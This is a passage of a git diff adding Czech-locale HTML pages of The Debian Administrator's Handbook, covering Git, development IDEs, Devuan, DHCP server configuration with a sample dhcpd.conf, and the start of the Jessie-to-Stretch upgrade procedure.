+                          class="emphasis"><em>CULTURE</em></span> Git</strong></p></div></div></div><a
+                id="id-1.4.6.7.5.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.3"
+                class="indexterm"></a><div
+                class="para">
+					Git is a tool for collaborative work on multiple files, while maintaining a history of modifications. The files in question are generally text files, such as a program's source code. If several people work together on the same file, <code
+                  class="command">git</code> can only merge the alterations made if they were made to different portions of the file. Otherwise, these “conflicts” must be resolved by hand.
+				</div><div
+                class="para">
+					Git is a distributed system where each user has a repository with the complete history of changes. Central repositories are used to download the project (<code
+                  class="command">git clone</code>) and to share the work done with others (<code
+                  class="command">git push</code>). The repository can contain multiple versions of the files but only one version can be worked on at a given time: it's called the working copy (it can be changed to point to another version with <code
+                  class="command">git checkout</code>). Git can show you the modifications made to the working copy (<code
+                  class="command">git diff</code>), can store them in the repository by creating a new entry in the versions history (<code
+                  class="command">git commit</code>), can update the working copy to include modifications made in parallel by other users (<code
+                  class="command">git pull</code>), and can record a particular configuration in the history in order to be able to easily extract it later on (<code
+                  class="command">git tag</code>).
+				</div><div
+                class="para">
+					Git makes it easy to handle multiple concurrent versions of a project in development without them interfering with each other. These versions are called <span
+                  class="emphasis"><em>branches</em></span>. This metaphor of a tree is fairly accurate, since a program is initially developed on a common trunk. When a milestone has been reached (such as version 1.0), development continues on two branches: the development branch prepares the next major release, and the maintenance branch manages updates and fixes for version 1.0.
+				</div><a
+                id="id-1.4.6.7.5.3.7"
+                class="indexterm"></a><div
+                class="para">
+					Git is, nowadays, the most popular version control system but it is not the only one. Historically, CVS (Concurrent Versions System) was the first widely used tool but its numerous limitations contributed to the appearance of more modern free alternatives. These include, especially, <code
+                  class="command">subversion</code> (<code
+                  class="command">svn</code>), <code
+                  class="command">git</code>, <code
+                  class="command">bazaar</code> (<code
+                  class="command">bzr</code>), and <code
+                  class="command">mercurial</code> (<code
+                  class="command">hg</code>). <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.nongnu.org/cvs/">http://www.nongnu.org/cvs/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://subversion.apache.org/">http://subversion.apache.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://git-scm.com/">http://git-scm.com/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://bazaar.canonical.com/">http://bazaar.canonical.com/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://mercurial.selenic.com/">http://mercurial.selenic.com/</a></div>
+				</div><a
+                id="id-1.4.6.7.5.3.9"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.10"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.11"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.12"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.13"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.14"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.5.3.15"
+                class="indexterm"></a></div><div
+              class="para">
+					Debian has developed little software of its own, but certain programs have assumed a starring role, and their fame has spread beyond the scope of the project. Good examples are <code
+                class="command">dpkg</code>, the Debian package management program (it is, in fact, an abbreviation of Debian PacKaGe, and generally pronounced as “dee-package”), and <code
+                class="command">apt</code>, a tool to automatically install any Debian package, and its dependencies, guaranteeing the consistency of the system after an upgrade (its name is an acronym for Advanced Package Tool). Their teams are, however, much smaller, since a rather high level of programming skill is required to gain an overall understanding of the operations of these types of programs.
+				</div><div
+              class="para">
+					The most important team is probably that for the Debian installation program, <code
+                class="command">debian-installer</code>, which has accomplished a work of momentous proportions since its conception in 2001. Numerous contributors were needed, since it is difficult to write a single program able to install Debian on a dozen different architectures. Each one has its own mechanism for booting and its own bootloader. All of this work is coordinated on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-boot@lists.debian.org">debian-boot@lists.debian.org</a></code> mailing list, under the direction of Cyril Brulebois. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/devel/debian-installer/">http://www.debian.org/devel/debian-installer/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://joeyh.name/blog/entry/d-i_retrospective/">http://joeyh.name/blog/entry/d-i_retrospective/</a></div>
+				</div><div
+              class="para">
+					The (very small) <code
+                class="command">debian-cd</code> program team has an even more modest objective. Many “small” contributors are responsible for their architecture, since the main developer can not know all the subtleties, nor the exact way to start the installer from the CD-ROM.
+				</div><div
+              class="para">
+					Many teams must collaborate with others in the activity of packaging: <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-qa@lists.debian.org">debian-qa@lists.debian.org</a></code> tries, for example, to ensure quality at all levels of the Debian project. The <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code> list develops Debian Policy according to proposals from all over the place. The teams in charge of each architecture (<code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-architecture@lists.debian.org">debian-<em
+                    class="replaceable">architecture</em>@lists.debian.org</a></code>) compile all packages, adapting them to their particular architecture, if needed.
+				</div><div
+              class="para">
+					Other teams manage the most important packages in order to ensure maintenance without placing too heavy a load on a single pair of shoulders; this is the case with the C library and <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-glibc@lists.debian.org">debian-glibc@lists.debian.org</a></code>, the C compiler on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-gcc@lists.debian.org">debian-gcc@lists.debian.org</a></code> list, or Xorg on the <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-x@lists.debian.org">debian-x@lists.debian.org</a></code> (this group is also known as the X Strike Force).
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.foundation-documents.html"><strong>Předcházející</strong>1.2. Dokumenty nadace</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.follow-debian-news.html"><strong>Další</strong>1.4. Follow Debian News</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.development.html b/tmp/cs-CZ/html/sect.development.html
new file mode 100644
index 000000000..9a80ee23c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.development.html
@@ -0,0 +1,126 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.6. Development</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.web-browsers.html"
+        title="13.5. Web Browsers" /><link
+        rel="next"
+        href="sect.collaborative-work.html"
+        title="13.7. Collaborative Work" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.development.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.web-browsers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.collaborative-work.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.development"></a>13.6. Development</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.9.2"></a>13.6.1. Tools for GTK+ on GNOME</h3></div></div></div><div
+            class="para">
+				Anjuta (in the <span
+              class="pkg pkg">anjuta</span> package) and GNOME Builder (in the <span
+              class="pkg pkg">gnome-builder</span> package) are Integrated Development Environments (<acronym
+              class="acronym">IDE</acronym>) optimized for creating GTK+ applications for GNOME. Glade (in the <span
+              class="pkg pkg">glade</span> package) is an application designed to create GTK+ graphical interfaces for GNOME and save them in an XML file. These XML files can then be loaded by the GTK+ shared library though its <code
+              class="literal">GtkBuilder</code> component to recreate the saved interfaces; such a feature can be interesting, for instance for plugins that require dialogs. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.gnome.org/Apps/Builder">https://wiki.gnome.org/Apps/Builder</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://anjuta.org/">http://anjuta.org/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://glade.gnome.org/">https://glade.gnome.org/</a></div>
+			</div><a
+            id="id-1.16.9.2.3"
+            class="indexterm"></a><a
+            id="id-1.16.9.2.4"
+            class="indexterm"></a><a
+            id="id-1.16.9.2.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.9.3"></a>13.6.2. Tools for Qt</h3></div></div></div><div
+            class="para">
+				The equivalent applications for Qt applications are KDevelop by KDE (in the <span
+              class="pkg pkg">kdevelop</span> package) for the development environment, and Qt Designer (in the <span
+              class="pkg pkg">qttools5-dev-tools</span> package) for the design of graphical interfaces for Qt applications.
+			</div><div
+            class="para">
+				KDevelop is also a generic IDE and provides plugins for other languages like Python and PHP and different build systems.
+			</div><a
+            id="id-1.16.9.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.9.3.5"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.web-browsers.html"><strong>Předcházející</strong>13.5. Web Browsers</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.collaborative-work.html"><strong>Další</strong>13.7. Collaborative Work</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.devuan.html b/tmp/cs-CZ/html/sect.devuan.html
new file mode 100644
index 000000000..17a191cdd
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.devuan.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.9. Devuan</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.kali.html"
+        title="A.8. Kali Linux" /><link
+        rel="next"
+        href="sect.tanglu.html"
+        title="A.10. Tanglu" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.devuan.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kali.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tanglu.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.devuan"></a>A.9. Devuan</h2></div></div></div><a
+          id="id-1.20.12.2"
+          class="indexterm"></a><div
+          class="para">
+			Devuan is a relatively new fork of Debian: it started in 2014 as a reaction to the decision made by Debian to switch to <code
+            class="command">systemd</code> as the default init system. A group of users attached to <code
+            class="command">sysv</code> and opposing (real or perceived) drawbacks to <code
+            class="command">systemd</code> started Devuan with the objective of maintaining a <code
+            class="command">systemd</code>-less system. As of March 2015, they haven't published any real release: it remains to be seen if the project will succeed and find its niche, or if the systemd opponents will learn to accept it. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://devuan.org">https://devuan.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kali.html"><strong>Předcházející</strong>A.8. Kali Linux</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tanglu.html"><strong>Další</strong>A.10. Tanglu</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.dhcp.html b/tmp/cs-CZ/html/sect.dhcp.html
new file mode 100644
index 000000000..a8d96eb55
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.dhcp.html
@@ -0,0 +1,184 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.7. DHCP</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.domain-name-servers.html"
+        title="10.6. Domain Name Servers (DNS)" /><link
+        rel="next"
+        href="sect.network-diagnosis-tools.html"
+        title="10.8. Network Diagnosis Tools" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dhcp.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.domain-name-servers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-diagnosis-tools.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dhcp"></a>10.7. DHCP</h2></div></div></div><div
+          class="para">
+			DHCP (for <span
+            class="emphasis"><em>Dynamic Host Configuration Protocol</em></span>) is a protocol by which a machine can automatically get its network configuration when it boots. This allows centralizing the management of network configurations, and ensuring that all desktop machines get similar settings.
+		</div><a
+          id="id-1.13.10.3"
+          class="indexterm"></a><a
+          id="id-1.13.10.4"
+          class="indexterm"></a><a
+          id="id-1.13.10.5"
+          class="indexterm"></a><div
+          class="para">
+			A DHCP server provides many network-related parameters. The most common of these is an IP address and the network where the machine belongs, but it can also provide other information, such as DNS servers, WINS servers, NTP servers, and so on.
+		</div><div
+          class="para">
+			The Internet Software Consortium (also involved in developing <code
+            class="command">bind</code>) is the main author of the DHCP server. The matching Debian package is <span
+            class="pkg pkg">isc-dhcp-server</span>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dhcp-config"></a>10.7.1. Configuring</h3></div></div></div><div
+            class="para">
+				The first elements that need to be edited in the DHCP server configuration file (<code
+              class="filename">/etc/dhcp/dhcpd.conf</code>) are the domain name and the DNS servers. If this server is alone on the local network (as defined by the broadcast propagation), the <code
+              class="literal">authoritative</code> directive must also be enabled (or uncommented). One also needs to create a <code
+              class="literal">subnet</code> section describing the local network and the configuration information to be provided. The following example fits a <code
+              class="literal">192.168.0.0/24</code> local network with a router at <code
+              class="literal">192.168.0.1</code> serving as the gateway. Available IP addresses are in the range <code
+              class="literal">192.168.0.128</code> to <code
+              class="literal">192.168.0.254</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.dhcp-dhcpd.conf"></a><p
+              class="title"><strong>Příklad 10.15. Excerpt of <code
+                  class="filename">/etc/dhcp/dhcpd.conf</code></strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+#
+# Sample configuration file for ISC dhcpd for Debian
+#
+
+# The ddns-updates-style parameter controls whether or not the server will
+# attempt to do a DNS update when a lease is confirmed. We default to the
+# behavior of the version 2 packages ('none', since DHCP v2 didn't
+# have support for DDNS.)
+ddns-update-style interim;
+
+# option definitions common to all supported networks...
+option domain-name "internal.falcot.com";
+option domain-name-servers ns.internal.falcot.com;
+
+default-lease-time 600;
+max-lease-time 7200;
+
+# If this DHCP server is the official DHCP server for the local
+# network, the authoritative directive should be uncommented.
+authoritative;
+
+# Use this to send dhcp log messages to a different log file (you also
+# have to hack syslog.conf to complete the redirection).
+log-facility local7;
+
+# My subnet
+subnet 192.168.0.0 netmask 255.255.255.0 {
+    option routers 192.168.0.1;
+    option broadcast-address 192.168.0.255;
+    range 192.168.0.128 192.168.0.254;
+    ddns-domainname "internal.falcot.com";
+}
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dhcp-dns"></a>10.7.2. DHCP and DNS</h3></div></div></div><a
+            id="id-1.13.10.9.2"
+            class="indexterm"></a><div
+            class="para">
+				A nice feature is the automated registering of DHCP clients in the DNS zone, so that each machine gets a significant name (rather than something impersonal such as <code
+              class="literal">machine-192-168-0-131.internal.falcot.com</code>). Using this feature requires configuring the DNS server to accept updates to the <code
+              class="literal">internal.falcot.com</code> DNS zone from the DHCP server, and configuring the latter to submit updates for each registration.
+			</div><div
+            class="para">
+				In the <code
+              class="command">bind</code> case, the <code
+              class="literal">allow-update</code> directive needs to be added to each of the zones that the DHCP server is to edit (the one for the <code
+              class="literal">internal.falcot.com</code> domain, and the reverse zone). This directive lists the IP addresses allowed to perform these updates; it should therefore contain the possible addresses of the DHCP server (both the local address and the public address, if appropriate).
+			</div><pre
+            class="programlisting">
+allow-update { 127.0.0.1 192.168.0.1 212.94.201.10 !any };
+</pre><div
+            class="para">
+				Beware! A zone that can be modified <span
+              class="emphasis"><em>will</em></span> be changed by <code
+              class="command">bind</code>, and the latter will overwrite its configuration files at regular intervals. Since this automated procedure produces files that are less human-readable than manually-written ones, the Falcot administrators handle the <code
+              class="literal">internal.falcot.com</code> domain with a delegated DNS server; this means the <code
+              class="literal">falcot.com</code> zone file stays firmly under their manual control.
+			</div><div
+            class="para">
+				The DHCP server configuration excerpt above already includes the directives required for DNS zone updates: they are the <code
+              class="literal">ddns-update-style interim;</code> and <code
+              class="literal">ddns-domain-name "internal.falcot.com";</code> lines in the block describing the subnet.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.domain-name-servers.html"><strong>Předcházející</strong>10.6. Domain Name Servers (DNS)</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-diagnosis-tools.html"><strong>Další</strong>10.8. Network Diagnosis Tools</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.dist-upgrade.html b/tmp/cs-CZ/html/sect.dist-upgrade.html
new file mode 100644
index 000000000..fa1dcf5f0
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.dist-upgrade.html
@@ -0,0 +1,199 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.6. Upgrading from One Stable Distribution to the Next</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.package-authentication.html"
+        title="6.5. Checking Package Authenticity" /><link
+        rel="next"
+        href="sect.regular-upgrades.html"
+        title="6.7. Keeping a System Up to Date" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dist-upgrade.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-authentication.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.regular-upgrades.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dist-upgrade"></a>6.6. Upgrading from One Stable Distribution to the Next</h2></div></div></div><div
+          class="para">
+			One of the best-known features of Debian is its ability to upgrade an installed system from one stable release to the next: <span
+            class="foreignphrase"><em
+              class="foreignphrase">dist-upgrade</em></span> — a well-known phrase — has largely contributed to the project's reputation. With a few precautions, upgrading a computer can take as little as a few minutes, or a few dozen minutes, depending on the download speed from the package repositories.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.15.3"></a>6.6.1. Recommended Procedure</h3></div></div></div><div
+            class="para">
+				Since Debian has quite some time to evolve in-between stable releases, you should read the release notes before upgrading.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Release notes</strong></p></div></div></div><div
+              class="para">
+				The release notes for an operating system (and, more generally, for any software) are a document giving an overview of the software, with some details concerning the particularities of one version. These documents are generally short compared to the complete documentation, and they usually list the features which have been introduced since the previous version. They also give details on upgrading procedures, warnings for users of previous versions, and sometimes errata.
+			</div><div
+              class="para">
+				Release notes are available online: the release notes for the current stable release have a dedicated URL, while older release notes can be found with their codenames: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/releasenotes">http://www.debian.org/releases/stable/releasenotes</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/jessie/releasenotes">http://www.debian.org/releases/jessie/releasenotes</a></div>
+			</div></div><div
+            class="para">
+				In this section, we will focus on upgrading a <span
+              class="distribution distribution">Jessie</span> system to <span
+              class="distribution distribution">Stretch</span>. This is a major operation on a system; as such, it is never 100% risk-free, and should not be attempted before all important data has been backed up.
+			</div><div
+            class="para">
+				Another good habit which makes the upgrade easier (and shorter) is to tidy your installed packages and keep only the ones that are really needed. Helpful tools to do that include <code
+              class="command">aptitude</code>, <code
+              class="command">deborphan</code> and <code
+              class="command">debfoster</code> (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.automatic-tracking">6.2.7 – „Tracking Automatically Installed Packages“</a>). For example, you can use the following command, and then use <code
+              class="command">aptitude</code>'s interactive mode to double check and fine-tune the scheduled removals:
+			</div><pre
+            class="screen"># <strong
+              class="userinput"><code>deborphan | xargs aptitude --schedule-only remove</code></strong></pre><div
+            class="para">
+				Now for the upgrading itself. First, you need to change the <code
+              class="filename">/etc/apt/sources.list</code> file to tell APT to get its packages from <span
+              class="distribution distribution">Stretch</span> instead of <span
+              class="distribution distribution">Jessie</span>. If the file only contains references to <span
+              class="distribution distribution">Stable</span> rather than explicit codenames, the change isn't even required, since <span
+              class="distribution distribution">Stable</span> always refers to the latest released version of Debian. In both cases, the database of available packages must be refreshed (with the <code
+              class="command">apt update</code> command or the refresh button in <code
+              class="command">synaptic</code>).
+			</div><div
+            class="para">
+				Once these new package sources are registered, you should first do a minimal upgrade with <code
+              class="command">apt upgrade</code>. By doing the upgrade in two steps, we ease the job of the package management tools and often ensure that we have the latest versions of those, which might have accumulated bugfixes and improvements required to complete the full distribution upgrade.
+			</div><div
+            class="para">
+				Once this first upgrade is done, it is time to handle the upgrade itself, either with <code
+              class="command">apt full-upgrade</code>, <code
+              class="command">aptitude</code>, or <code
+              class="command">synaptic</code>. You should carefully check the suggested actions before applying them: you might want to add suggested packages or deselect packages which are only recommended and known not to be useful. In any case, the front-end should come up with a scenario ending in a coherent and up-to-date <span
+              class="distribution distribution">Stretch</span> system. Then, all you need is to do is wait while the required packages are downloaded, answer the Debconf questions and possibly those about locally modified configuration files, and sit back while APT does its magic.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.15.4"></a>6.6.2. Handling Problems after an Upgrade</h3></div></div></div><div
+            class="para">
+				In spite of the Debian maintainers' best efforts, a major system upgrade isn't always as smooth as you could wish. New software versions may be incompatible with previous ones (for instance, their default behavior or their data format may have changed). Also, some bugs may slip through the cracks despite the testing phase which always precedes a Debian release.
+			</div><div
+            class="para">
+				To anticipate some of these problems, you can install the <span
+              class="pkg pkg">apt-listchanges</span> package, which displays information about possible problems at the beginning of a package upgrade. This information is compiled by the package maintainers and put in <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/NEWS.Debian</code> files for the benefit of users. Reading these files (possibly through <span
+              class="pkg pkg">apt-listchanges</span>) should help you avoid bad surprises.
+			</div><div
+            class="para">
